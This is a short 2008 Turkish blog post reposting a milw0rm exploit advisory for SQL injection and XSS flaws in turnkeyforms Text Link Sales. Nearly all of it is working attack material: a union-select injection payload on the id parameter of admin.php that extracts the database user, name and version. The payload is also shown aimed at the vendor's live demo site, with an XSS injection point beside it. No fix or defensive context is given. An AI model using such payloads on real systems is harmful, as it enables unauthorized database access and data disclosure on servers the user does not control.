turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability

15 Kasım 2008 Cumartesi

turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability

turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7124

Discovered By: ZoRLu

Exploit: sql inj

http://localhost/script/admin.php?a=users&id=[SQL]

[SQL]

999+union+select+1,user(),database(),version(),5,6,7--

sql for demo:

http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--

xss:

http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=[XSS]

ZoRLu | ZRL | Buffer Overflow

15 Kasım 2008 Cumartesi

turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability

0 yorum:

About Me

Blog Archive

İzleyiciler

Bağlantılarım

Inj3ct0r.com